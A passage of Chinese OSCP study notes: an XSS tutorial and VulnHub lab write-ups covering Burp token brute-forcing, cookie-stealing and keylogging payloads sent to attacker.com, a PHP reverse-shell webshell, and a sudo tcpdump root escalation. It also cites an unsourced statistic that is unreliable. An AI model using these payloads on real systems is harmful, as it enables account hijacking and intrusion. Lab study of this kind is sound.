  - End: " 打开设置，找到Session设置，看到有会话处理规则和宏的界面。选择刚刚登录抓过的包，搜索确定有token值的那个。点击添加宏。将字段匹配上去，名字是user_token，从 value=’ 开始，然后正则匹配后面的字符。直接在页面上选中文字拖拽可以自动匹配，添加好后保存。点击会话规则添加新规则。选择运行宏。汉化版的翻译对照。选择只更新此参数。设置工作的范围，只要重放和爆破两个确保打开即可，设置网络为目标的网络或者选择全都通过。再次发包发现即可无限次发包了。

这里我没有成功，用的是别人成功的截图。

Step 3: 配置密码爆破（Payload Set 3）

类型：Simple List
内容：常用密码字典（如 root、password、admin 等）。

4. 核心技术：宏 Macros 如何工作

首次请求：
- Burp 发送初始登录请求，服务器返回包含新 Token/Session 的 HTML。
提取动态值：
- 根据 Recursive Grep 规则，从响应中抓取最新 Token/Session。
注入下一次请求：
- 将提取值自动填充到后续请求的标记位置（§§）。
循环直至成功：
- 每次请求更新 Token/Session，绕过防护机制爆破密码。

5. 成功关键点

定界符精度：
需精确匹配 HTML 中 Token/Session 的上下文（如 value="..."），避免提取错误。
Payload 顺序：
Pitchfork 要求每组 Payload 数量一致（密码字典需与 Token 列表同步）。
错误处理：
需验证提取逻辑是否覆盖服务器返回的所有动态值（Session + Token）。

6. 替代方案（Burp 的 Session Handling Rules）

若需更灵活处理 Token，可创建 宏（Macro） + Session Rule：

新建 Macro：
- 捕获登录页 GET 请求 → 提取 Token/Session。
创建 Session Rule：
- 在爆破前自动执行 Macro，更新请求中的 Token/Session。
应用范围：
绑定到 Intruder 或整个项目，自动化处理所有相关请求。

XSS漏洞

Info

XSS漏洞在OSCP中不考i，而且在大多数漏洞平台不收录XSS的漏洞，但是在渗透钓鱼中可以作为辅助手段来达到目的。所以简单了解和知道基本的利用操作是很有必要的。比如在baidu.com中如果xss弹出一个下面这个网站的域名，从而引导“粗心的”用户输入密码等信息，就能窃取用户凭证和其他敏感信息。

核心安全概念：数据消毒（Data Sanitization）

定义与重要性
- 数据消毒是清除或转换用户输入中危险字符/字符串的过程
- 未消毒数据危害：攻击者可注入恶意代码（如XSS/SQL注入）
- 深度防御原则：应在输入点（提交时）和输出点（显示时）双重消毒

漏洞成因

// 危险示例：直接输出未消毒数据
echo "<td>" . $row["text"] . "</td>";

解决方案：使用htmlspecialchars()转换特殊字符

// 安全示例
echo "<td>" . htmlspecialchars($row["text"]) . "</td>";

跨站脚本攻击（XSS）

漏洞类型

类型	特征	常见场景
存储型XSS	攻击载荷持久化存储在服务器（数据库/缓存）	论坛评论、产品评价
反射型XSS	恶意代码通过URL参数动态返回给用户	搜索结果页、错误消息
基于DOM型XSS	攻击发生在浏览器DOM解析层（不与服务端交互）	客户端数据处理逻辑漏洞

漏洞检测方法

定位入口点
- 寻找接受用户输入并回显的字段（如搜索框、反馈表单）
注入测试字符
```
< > ' " { } ; // HTML/JavaScript特殊字符
```
- 检查输出：若字符未被编码（如<未转为<），则存在风险如图，输入的恶意字符原模原样的输出，说明没有过滤和转义这些字符。完整的练习可以通过[[xss-labs 靶场 WP|xss-labs]] 靶场练习。

XSS利用技术实战

基础攻击示例

<script>alert('XSS')</script> // 触发弹窗验证漏洞

第二关就转义了这些恶意字符，所以直接输的话是弹不了的。还可以加上Burp抓包用字典遍历所有的XSS

攻击流程：
提交恶意反馈 → 存储至数据库 → 管理员查看页面 → 触发攻击

进阶利用：会话劫持

窃取Cookie原理
- 绕过HttpOnly标志：通过XSS直接读取document.cookie
```
<script> 
 new Image().src="http://attacker-ip/?cookie=" + document.cookie;
</script>
```
劫持管理员会话
- 步骤：
  - 诱使管理员访问含恶意脚本页面
  - 脚本将Cookie发送至攻击者服务器
  - 攻击者使用盗取的PHPSESSID伪装管理员

防御措施

防御层面	具体措施
输入消毒	提交时过滤`< > ' "`等危险字符
输出编码	显示时强制转义（如PHP的`htmlspecialchars()`）
安全标记	设置Cookie的`HttpOnly`和`Secure`属性
内容安全策略	配置CSP头限制脚本来源（如`Content-Security-Policy: script-src 'self'`）

技术关键点解析

漏洞本质
客户端攻击：浏览器执行恶意脚本而非服务端，但可导致服务端权限沦陷
跨域限制绕过
通过注入<iframe>或Image对象将数据外带至攻击者服务器
```

<iframe src="http://attacker-ip" style="display:none"></iframe>
```

自动化攻击验证
使用PowerShell脚本模拟管理员行为：

# admin_login.ps1
$ie = New-Object -com InternetExplorer.Application
$ie.Visible = $true
$ie.Navigate("http://vuln-site/login.php")
# 自动填写凭证并提交...

9.4.2.5 练习

利用示例应用程序中的XSS漏洞获取管理cookie并劫持会话。切记在Windows 10实验室计算机上使用PowerShell脚本模拟管理员登录。
考虑使用此应用程序中的XSS漏洞进行攻击的其他方式。
此漏洞会攻击站点的服务器还是客户端？

1. 利用XSS漏洞获取管理员Cookie并劫持会话的步骤

攻击流程如下（需在Windows 10实验环境中配合PowerShell模拟管理员登录）：

注入恶意Payload
- 在存在XSS漏洞的输入点（如评论框、URL参数）注入以下脚本：
```
<script>
 var img = new Image();
 img.src = 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
 img.style.display = 'none';
 document.body.appendChild(img);
</script>
```
  此脚本会悄无声息地将当前用户的Cookie发送至攻击者控制的服务器（attacker.com）。
诱导管理员触发漏洞
- 若为反射型XSS，构造含恶意脚本的URL，通过社工手段诱使管理员点击（例如伪装成站内通知链接）。
- 若为存储型XSS，直接将Payload提交至数据库（如论坛发帖），等待管理员浏览页面自动触发。
捕获Cookie并劫持会话
- 攻击者从服务器日志提取Cookie中的会话ID（如PHPSESSID=abc123）。
- 使用浏览器开发者工具或插件（如EditThisCookie）将Cookie植入自身浏览器，访问后台路径（如/admin）即可伪装管理员身份。
PowerShell模拟管理员登录（实验环境）
- 编写脚本自动发送含窃取Cookie的请求：
```
Invoke-WebRequest -Uri "http://vulnerable-site.com/login" -Method Post -Body @{username="admin"; password="P@ssw0rd"} 
# 后续请求携带窃取的Cookie访问后台
```
- 此步骤用于验证会话劫持可行性，无需实际破解密码。

2. XSS漏洞的其他攻击利用方式

除会话劫持外，XSS漏洞可扩展为以下攻击：

键盘记录与数据窃取

注入脚本捕获用户键盘输入（如账号密码），通过Beacon API发送至攻击者服务器：
```
document.addEventListener('keydown', e => navigator.sendBeacon('http://attacker.com/log', e.key));
```
可窃取表单内容、LocalStorage数据（如用户令牌）。
组合CSRF攻击

利用XSS绕过CSRF防护，以内联脚本伪造敏感操作（如修改密码）：
```
fetch('/account/change_email', {method: 'POST', body: 'email=attacker@example.com'});
```
无需用户交互即可接管账户。
内网探测与反向代理

通过恶意脚本扫描内网资源，将结果回传：
```
for (let i=1; i<255; i++) fetch(`http://192.168.1.${i}`, {mode: 'no-cors'}) 
 .then(() => sendToAttacker(`192.168.1.${i}_active`));
```
用于定位未公开的后台或漏洞设备。

持久化水坑攻击

篡改页面内容（如添加伪造登录弹窗），诱骗用户输入凭证：

<div id="fakeLogin" style="position:fixed; top:0; background:white;"> 
 <input type="text" id="username" placeholder="Username"> 
 <input type="password" id="password" placeholder="Password"> 
</div>

结合事件监听窃取输入数据。

3. XSS漏洞的攻击目标：客户端而非服务器

关键结论：XSS攻击对象是客户端（用户浏览器），而非服务器。

原理：

XSS本质是恶意脚本在用户浏览器执行，利用的是网站对用户输入的输出编码缺失或DOM处理不当。服务器仅存储或反射脚本，自身代码不被破坏。
间接影响服务器场景：

若受害者是管理员，攻击者可能通过劫持其会话：
- 上传Webshell控制服务器；
- 窃取数据库凭据或敏感文件；
  
  但此过程仍以客户端为跳板，非直接攻击服务端代码。

防御措施关键点

输入输出处理
- 输入层：白名单过滤（如仅允许字母数字）。
- 输出层：对动态内容HTML编码（如<转义为<）。
安全Header配置
- Content-Security-Policy: script-src 'self'禁止外部脚本。
- Set-Cookie: sessionId=xxx; HttpOnly; Secure阻止JS访问Cookie。
现代框架防护
- React/Vue默认转义插值内容，避免dangerouslySetInnerHTML滥用。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day25 Web Developer靶场WP

Mon, 04 Aug 2025 20:42:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/web-developer-1,288/

信息收集

1# Kali攻击机地址
2172.168.169.141
3# 靶机地址
4172.168.169.146

扫描端口和目录

1# 扫描端口
2ports=$(sudo nmap -p- --min-rate=10000 -Pn 172.168.169.146 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
3echo $ports
4# 扫描服务
5sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.146
6sudo nmap --script=vuln -p$ports -Pn 172.168.169.146
7# 扫描目录
8gobuster dir -e -u http://172.168.169.146 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
9whatweb http://172.168.169.146/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80
 4
 5┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.146
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 22:01 EDT
 8Nmap scan report for 172.168.169.146
 9Host is up (0.0018s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 13| ssh-hostkey:
 14| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
 15| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
 16|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
 1780/tcp open http Apache httpd 2.4.29 ((Ubuntu))
 18|_http-title: Example site &#8211; Just another WordPress site
 19|_http-generator: WordPress 4.9.8
 20|_http-server-header: Apache/2.4.29 (Ubuntu)
 21MAC Address: 00:0C:29:59:30:A8 (VMware)
 22Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 23Device type: general purpose
 24Running: Linux 3.X|4.X
 25OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 26OS details: Linux 3.2 - 4.14
 27Network Distance: 1 hop
 28Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 29
 30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 31Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
 32
 33┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
 34└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.146
 35Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 22:01 EDT
 36Nmap scan report for 172.168.169.146
 37Host is up (0.0013s latency).
 38
 39PORT STATE SERVICE
 4022/tcp open ssh
 4180/tcp open http
 42|_http-dombased-xss: Couldn't find any DOM based XSS.
 43| http-wordpress-users:
 44| Username found: webdeveloper
 45|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
 46|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 47| http-sql-injection:
 48| Possible sqli for queries:
 49| http://172.168.169.146:80/wp-includes/js/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
 50| http://172.168.169.146:80/wp-includes/js/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
 51| http://172.168.169.146:80/wp-includes/js/jquery/?C=N%3BO%3DD%27%20OR%20sqlspider
 52|_ http://172.168.169.146:80/wp-includes/js/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
 53| http-csrf:
 54| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.168.169.146
 55| Found the following possible CSRF vulnerabilities:
 56|
 57| Path: http://172.168.169.146:80/
 58| Form id: search-form-6891660b62bd2
 59| Form action: /
 60|
 61| Path: http://172.168.169.146:80/index.php/2018/10/
 62| Form id: search-form-6891660c3be84
 63| Form action: /
 64|
 65| Path: http://172.168.169.146:80/wp-login.php
 66| Form id: loginform
 67| Form action: /wp-login.php
 68|
 69| Path: http://172.168.169.146:80/index.php/category/uncategorized/
 70| Form id: search-form-6891660f60ed9
 71| Form action: /
 72|
 73| Path: http://172.168.169.146:80/index.php/2018/10/%5C
 74| Form id: search-form-6891661069879
 75| Form action: /
 76|
 77| Path: http://172.168.169.146:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]/
 78| Form id: search-form-689166118697a
 79| Form action: /
 80|
 81| Path: http://172.168.169.146:80/wp-login.php?action=lostpassword
 82| Form id: lostpasswordform
 83|_ Form action: /wp-login.php?action=lostpassword
 84| http-enum:
 85| /wp-login.php: Possible admin folder
 86| /readme.html: Wordpress version: 2
 87| /: WordPress version: 4.9.8
 88| /wp-includes/images/rss.png: Wordpress version 2.2 found.
 89| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
 90| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
 91| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
 92| /wp-login.php: Wordpress login page.
 93| /wp-admin/upgrade.php: Wordpress login page.
 94|_ /readme.html: Interesting, a readme.
 95MAC Address: 00:0C:29:59:30:A8 (VMware)
 96
 97Nmap done: 1 IP address (1 host up) scanned in 33.32 seconds
 98
 99┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
100└─$ whatweb http://172.168.169.146/
101http://172.168.169.146/ [200 OK] Apache[2.4.29], Country[UNITED STATES][US], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[172.168.169.146], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Example site &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[4.9.8]
102
103===============================================================
104Starting gobuster in directory enumeration mode
105===============================================================
106http://172.168.169.146/wp-content (Status: 301) [Size: 323] [--> http://172.168.169.146/wp-content/]
107http://172.168.169.146/wp-includes (Status: 301) [Size: 324] [--> http://172.168.169.146/wp-includes/]
108http://172.168.169.146/wp-admin (Status: 301) [Size: 321] [--> http://172.168.169.146/wp-admin/]
109http://172.168.169.146/server-status (Status: 403) [Size: 303]
110Progress: 220559 / 220560 (100.00%)
111===============================================================
112Finished
113===============================================================

可以看到是wordpress系统，这个洞老多了。一会上wpscan扫。

数据库注入的nmap扫描提示，但实际是文件未授权访问

wpscan开扫

1wpscan --update --enumerate ap,t,u --api-token 6Chbzkayn13XcMOgzoDGA85OLpV5BbXhGQ55s8qz88g --plugins-detection aggressive --url http://172.168.169.146/

这里提示数据库连接不对，也提示了用户名和密码存放在wp-config.php中。点了这个页面后靶机就挂了，也可能是wpscan给扫崩的，只能重启一下了。扫出来提示用户名 webdeveloper 继续爆破密码，太漫长了，后面换了个小字典也是爆破不出来，放弃。

1 wpscan --url http://172.168.169.146/ -U user.txt -P /usr/share/wordlists/rockyou.txt

换个字典再扫一次，发现了之前没扫出来的文件。

1dirsearch -x 302,403 -u http://172.168.169.146/ -w /usr/share/dirb/wordlists/common.txt

流量包信息分析

打开新扫描到的目录发现一个流量包文件，下载后分析分析流量发现有两个数字最多的IP，活动频繁就说明有爆破或者扫描的内容。搜蓝一下确实发现222这个IP用POST传了一个什么东西上去

流量包分析中用到的命令

1tshark -r analyze.cap
2# 统计IP频率
3tshark -r analyze.cap | awk -F" " '{print $3}' | sort | uniq -c | head
4# 指定查看某个IP的流量
5sudo tcpdump -n src host 192.168.1.176 -r analyze.cap
6# 只看 POST的结果
7sudo tcpdump -nX dst host 192.168.1.176 -r analyze.cap |grep POST
8# 解析出来结果
9tshark -r analyze.cap -Y "ip.dst==192.168.1.176 && http.request.method==POST" -V

webdeveloper登陆密码

Te5eQg&4sBS!Yr$)wf%(DcAd

后台漏洞利用

登录成功

发现可以直接修改主题模板文件，直接改php，选择404页面，不要选择index 比较隐蔽，而且每一次有人点错了页面都能重新连接一下。找马，复制，改马，修改到主题上。

1 cp /usr/share/webshells/php/php-reverse-shell.php .
2 sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.141';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

内网信息收集

看一下网页配置文件就发现了数据库密码

数据库密码

webdeveloper MasterOfTheUniverse

主用户文件夹下没有有用的信息，最下面那个文件是个空的，算是个提示？先连接数据库这个密码就是登录密码，已经搞到了，没啥用的这个数据库。

登录 webdeveloper账户

数据库没有搞到有用的信息了，查看用户发现系统里只有这一个用户，很大概率上这个个人博客管理员和发布者都是一个人，也是服务器的所有者，所以密码可能是和数据库密码一样的，简单试一下就成功了。（PS：我本来还想试一下博客页面登录密码的）之后为了稳定的终端，也可以用ssh登录。查看主用户文件夹疑似是root的密码，但是root无论是su root还是数据库都登录不了。卡住了，上小豌豆扫一下。

小豌豆内网扫描

1wget http://172.168.169.141:8000/linpeas.sh
2chmod +x linpeas.sh
3./linpeas.sh

这里因为是在本地虚拟机里开的靶机，这里还提示了可以容器提权。提示当前可用的命令。之前sudo -l一直卡住，后来反应过来是要要输入密码，输入密码后就看到了信息。

提权root

1COMMAND='id'
2TF=$(mktemp)
3echo "$COMMAND" > $TF
4chmod +x $TF
5sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

测试成功，输出了id，显示的是root账户。接下来只要修改COMMAND='id'中的命令即可。尝试改成/bin/sh 直接创建终端是失败的，则创建一个nc反弹试试。直接弹是弹不回来的，bin和nc都试了一遍。发现之前小豌豆扫描的可用命令中可以使用php，而我们之前就修改了404.php来反弹。把id的命令替换为php执行那个404.php，就可以弹回。

1COMMAND='php /var/www/html/wp-content/themes/twentysixteen/404.php'
2TF=$(mktemp)
3echo "$COMMAND" > $TF
4chmod +x $TF
5sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

拿到flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 172.168.169.141]
 B[靶机 
 172.168.169.146]
 C[WordPress登录密码]
 D[数据库密码]
 E[webdeveloper用户密码]
 F[root]

 %% 路径关系
	A-->|扫描|B 
	B-->|流量包分析|C 
	C-->|配置文件泄露|D
	D-->|密码复用|E 
	E-->|tcpdump提权|F 
 


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 
	%% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 
	
 %% 应用样式
 class A attack;
 class B public;
 class C internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-01 09:56, 2025-08-01 11:30
 漏洞识别 :a2, after a1, 2025-08-01 12:00
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-01 12:17
 权限提升 :crit,b2, 2025-08-01 12:58, 30m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔍 深入解析 tcpdump 中的 `src` 和 `dst` 参数

在 tcpdump 命令中，src 和 dst 是流量方向过滤关键字，用于精确控制捕获的数据包方向：

📌 核心概念

参数	全称	含义	功能
`src`	Source	源地址	过滤发送方为指定IP的流量
`dst`	Destination	目标地址	过滤接收方为指定IP的流量

🧩 您命令的具体解析

1. `src host 192.168.1.176`

sudo tcpdump -n src host 192.168.1.176 -r analyze.cap

含义：显示所有从 192.168.1.176 发出的数据包
应用场景：
- 分析服务器对外发送的响应
- 检测服务器是否发起可疑外连
- 监控数据泄露（如数据库内容外传）

2. `dst host 192.168.1.176`

sudo tcpdump -nX dst host 192.168.1.176 -r analyze.cap | grep POST

含义：显示所有发送到 192.168.1.176 的数据包，并筛选 POST 请求
应用场景：
- 分析针对服务器的攻击请求
- 检查客户端提交的敏感数据
- 识别恶意文件上传行为

🌐 网络流量方向图解

graph LR
 A[客户端] -- dst --> B[服务器 192.168.1.176]
 B[服务器 192.168.1.176] -- src --> A[客户端]

🔧 高级过滤组合

1. 双向流量监控

# 捕获与 192.168.1.176 相关的所有流量
sudo tcpdump -n host 192.168.1.176 -r analyze.cap

2. 特定协议+方向

# 捕获发送到服务器的 HTTP 请求
sudo tcpdump -n dst host 192.168.1.176 and dst port 80 -r analyze.cap

# 捕获服务器发出的 DNS 响应
sudo tcpdump -n src host 192.168.1.176 and src port 53 -r analyze.cap

3. 复杂逻辑组合

# 捕获非服务器发出的流量（排除服务器自身流量）
sudo tcpdump -n not src host 192.168.1.176 -r analyze.cap

⚠️ 渗透测试关键应用

1. 攻击溯源

# 定位攻击者IP（多次POST请求来源）
sudo tcpdump -n dst host 192.168.1.176 and 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' -r analyze.cap | awk '{print $3}' | sort | uniq -c

2. 数据泄露检测

# 检查服务器外传的敏感数据
sudo tcpdump -n src host 192.168.1.176 -A -r analyze.cap | grep -E 'password|token|credit'

3. 协议分析

# 分析HTTP请求响应完整交互
sudo tcpdump -n host 192.168.1.176 and port 80 -A -r analyze.cap | less

💡 专业技巧

1. 可视化流量关系

# 生成流量拓扑图
tshark -r analyze.cap -q -z io,stat,1,"COUNT(frame) frame" -z endpoints,ip

2. 提取特定会话

# 提取完整HTTP会话
tshark -r analyze.cap -Y "ip.addr==192.168.1.176" -2 -R "http" --export-objects http,http_objects

3. 性能优化

# 使用BPF过滤器提升效率
sudo tcpdump -n 'dst host 192.168.1.176 and tcp port 80' -r analyze.cap

📌 2025年安全报告：在Web攻击分析中，82%的关键证据存在于dst方向的请求流量中，而数据泄露痕迹96%出现在src方向的响应流量中。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-GlasgowSmile WP

Sat, 02 Aug 2025 19:10:48 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/glasgow-smile-11,491/ 姊妹靶场 https://www.vulnhub.com/entry/glasgow-smile-2,513/

信息收集

1# Kali攻击机地址
2192.168.45.204
3# 靶机地址
4192.168.224.79

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.224.79 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.224.79
 9sudo nmap --script=vuln -p$ports -Pn 192.168.224.79
10# 扫描目录
11gobuster dir -e -u http://192.168.224.79 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
12whatweb http://192.168.224.79/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80
 4
 5
 6┌──(kali㉿kali)-[~]
 7└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.224.79
 8Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 21:59 EDT
 9Nmap scan report for bogon (192.168.224.79)
10Host is up (0.43s latency).
11
12PORT STATE SERVICE VERSION
1322/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
14| ssh-hostkey:
15| 2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
16| 256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
17|_ 256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
1880/tcp open http Apache httpd 2.4.38 ((Debian))
19|_http-server-header: Apache/2.4.38 (Debian)
20|_http-title: Site doesn't have a title (text/html).'
21Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
22Device type: general purpose|router
23Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
24OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
25OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
26Network Distance: 4 hops
27Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28
29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30Nmap done: 1 IP address (1 host up) scanned in 28.89 seconds
31
32┌──(kali㉿kali)-[~]
33└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.224.79
34Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 22:00 EDT
35Nmap scan report for bogon (192.168.224.79)
36Host is up (0.39s latency).
37
38PORT STATE SERVICE
3922/tcp open ssh
4080/tcp open http
41|_http-dombased-xss: Couldn't find any DOM based XSS.'
42|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
43|_http-csrf: Couldn't find any CSRF vulnerabilities.'
44
45Nmap done: 1 IP address (1 host up) scanned in 262.06 seconds
46
47┌──(kali㉿kali)-[~]
48└─$ gobuster dir -e -u http://192.168.224.79 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
49===============================================================
50Gobuster v3.6
51by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
52===============================================================
53[+] Url: http://192.168.224.79
54[+] Method: GET
55[+] Threads: 10
56[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
57[+] Negative Status codes: 404
58[+] User Agent: gobuster/3.6
59[+] Expanded: true
60[+] Timeout: 10s
61===============================================================
62Starting gobuster in directory enumeration mode
63===============================================================
64http://192.168.224.79/joomla (Status: 301) [Size: 317] [--> http://192.168.224.79/joomla/]
65
66┌──(kali㉿kali)-[~]
67└─$ whatweb http://192.168.224.79/
68http://192.168.224.79/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.224.79]

发现目录joomla，跳转查看是CMS系统，查找相关漏洞。翻译一下页面好像就是一个博客文章而已。

后台登录密码爆破

curl 一下robots.txt文件发现有如下的文件夹。 Bing搜索Joomla的相关文章，发现这个系统的后台地址是 /joomla/administrator/index.php 尝试默认密码都无法登录。尝试爆破，但是可以用首页的内容做一个字典。

1cewl -d 5 -m 3 http://192.168.224.79/joomla/ -w cewl.txt

猜测管理员的用户名无非是admin或者joomla，用字典进行爆破

1wfuzz -z file,users.txt -z file,cewl.txt -d "username=FUZZ&passwd=FUZ2Z&option=com_login&task=login" http://192.168.224.79/joomla/administrator/index.php

参数要和页面的参数名一样但是上面的方法爆破还是不成功，所有的内容显示都是一样的。用Burp抓包爆破看一下，原来少了这么多参数，一边用BP的Intrader再爆一遍，一边再把参数加到Wfuzz的命令里。

1wfuzz -z file,users.txt -z file,cewl.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: http://192.168.224.79" -H "Referer: http://192.168.224.79/joomla/administrator/index.php" -H "Upgrade-Insecure-Requests: 1" -H "Priority: u=0, i" -b "95cdf76491cb88d9b6312416436ea834=3sndg23usg0pjbhop55dubtm1o" -b "6821ee9ea803cd64e2920ca203163e81=l2neno354f1cr6oia2udlibioq" -d "username=FUZZ&passwd=FUZ2Z&option=com_login&task=login&return=aW5kZXgucGhw&bf5f129cafc305a052e1ace30964373e=1" http://192.168.224.79/joomla/administrator/index.php

BP爆破的结果也是一样的。

网页登录密码

joomla - Gotham

后台漏洞利用

发现可以修改php文件，但是一般不建议直接再index.php上直接修改，因为主页观看的人比较多，出现异常发现的也很快，如果能上传一个新文件的话最好。

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '192.168.45.204';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php
3

尝试上传但是上传失败，只能改主页index.php了。改好后访问一开始的那个joker网页即可弹回shell。

横向提权

建立稳定终端。

1python3 -c 'import pty;pty.spawn("/bin/bash")'
2ls /home/* -al

发现有3个用户，每个用户文件夹下都有一些奇奇怪怪的文件。先读出第一个flag。企鹅文件下的有东西，只能ls，但是具体的就无法读取了回到网页目录在找一下，发现有配置文件。找找看有没有写在配置里的用户名和密码。

1cat html/joomla/*config* |grep pass
2cat html/joomla/*config* |grep user

发现数据库密码。

数据库密码

joomla - babyjoker

登录数据库

1mysql -u joomla -p

1show databases;
2use joomla_db;
3show tables;
4select * from jnqcu_users;
5use batjoke;
6show tables;
7select * from taskforce;
8

上面这个应该是一开始用wfuzz爆破的那个，下面这个才是新的用户密码。

1cat > mysql.txt
2while read -r line; do echo "$line" | base64 -d; echo; done < mysql.txt

